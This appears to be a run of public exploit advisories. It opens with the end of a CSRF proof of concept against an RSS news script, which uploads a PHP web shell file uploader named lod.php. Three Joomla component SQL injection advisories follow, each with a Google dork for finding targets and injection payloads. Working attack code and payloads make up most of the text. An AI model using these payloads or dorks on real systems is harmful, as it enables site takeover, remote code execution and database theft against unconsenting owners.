  xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------2331884730649");
  xhr.withCredentials = true;
  var body = "-----------------------------2331884730649\r\n" +
    "Content-Disposition: form-data; name=\"title\"\r\n" +
    "\r\n" +
    "Test\r\n" +
    "-----------------------------2331884730649\r\n" +
    "Content-Disposition: form-data; name=\"category_id\"\r\n" +
    "\r\n" +
    "1\r\n" +
    "-----------------------------2331884730649\r\n" +
    "Content-Disposition: form-data; name=\"thumbnail\"; filename=\"lod.php\"\r\n" +
    "Content-Type: application/octet-stream\r\n" +
    "\r\n" +
    "\x3c?php echo \'\x3cform action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\"\x3e\'; echo \'\x3cinput type=\"file\" name=\"file\" size=\"50\"\x3e\x3cinput name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"\x3e\x3c/form\x3e\'; if( $_POST[\'_upl\'] == \"Upload\" ) { if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'\x3cb\x3eUpload Sukses!!!\x3cb\x3e\x3cbr\x3e\x3cbr\x3e\'; } else { echo \'\x3cb\x3eGagal Upload!!!\x3c/b\x3e\x3cbr\x3e\x3cbr\x3e\'; } } ?\x3e\r\n" +
    "\r\n" +
    "-----------------------------2331884730649\r\n" +
    "Content-Disposition: form-data; name=\"details\"\r\n" +
    "\r\n" +
    "\x3cp\x3etest\x3c/p\x3e\r\n" +
    "-----------------------------2331884730649\r\n" +
    "Content-Disposition: form-data; name=\"published\"\r\n" +
    "\r\n" +
    "1\r\n" +
    "-----------------------------2331884730649\r\n" +
    "Content-Disposition: form-data; name=\"submit\"\r\n" +
    "\r\n" +
    "\r\n" +
    "-----------------------------2331884730649--\r\n";
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++)
    aBody[i] = body.charCodeAt(i);
  xhr.send(new Blob([aBody]));
}
</script>
<br><br><br>
<center>
<h2><font color="red">[RSS News - AutoPilot Script] CSRF to Persistent XSS and RCE</font></h2>
<form action="#">
  <input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</center>
</body>
</html>
Vendor urgent update notice:
http://wpsup.com/products/rss-news-script/urgent-update-fix-security-bugs/
Fix/Patch: Update to latest version.
----------------------------------------------------------------------------------------------------------------------
Regards,
Arbin Godar
https://twitter.com/arbingodar
# # # # #
# Exploit Title: Joomla! Component Bazaar Platform v3.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_bazaar
# Date: 18.02.2017
# Vendor Homepage: http://matamko.com/
# Software Buy: http://matamko.com/products/bazaar/live-demo
# Demo: http://matamko.com/products/bazaar/live-demo
# Version: 3.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_bazaar&view=productsearch&searchproduct=a&category=[SQL]
# 1+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# http://localhost/[PATH]/index.php?option=com_bazaar&view=productsearch&searchproduct=[SQL]
# 1'+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# http://localhost/[PATH]/index.php?option=com_bazaar&view=product&productid=[SQL]
# 1+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# Etc...
# # # # #
# # # # #
# Exploit Title: Joomla! Component Room Management v1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_roommgmt
# Date: 18.02.2017
# Vendor Homepage: http://matamko.com/
# Software Buy: http://matamko.com/products/room-management/live-demo
# Demo: http://matamko.com/products/room-management/live-demo
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/room/book?tmpl=component&id=5&date=[SQL]
# '+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# http://localhost/[PATH]/my-bookings?task=booking.cancelBooking&status=[SQL]
# '+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# http://localhost/[PATH]/my-bookings?task=booking.cancelBooking&status=0&id=[SQL]
# +/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# Etc...
# # # # #
# # # # #
# Exploit Title: Joomla! Component OS Property v3.0.8 - SQL Injection
# Google Dork: inurl:index.php?option=com_osproperty
# Date: 18.02.2017
# Vendor Homepage: https://www.joomdonation.com/
# Software Buy: https://www.joomdonation.com/joomla-extensions/os-property-joomla-real-estate.html
# Demo: http://osproperty.ext4joomla.com/
# Version: 3.0.8
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_osproperty&view=ltype&catIds[0]=[SQL]
# # # # #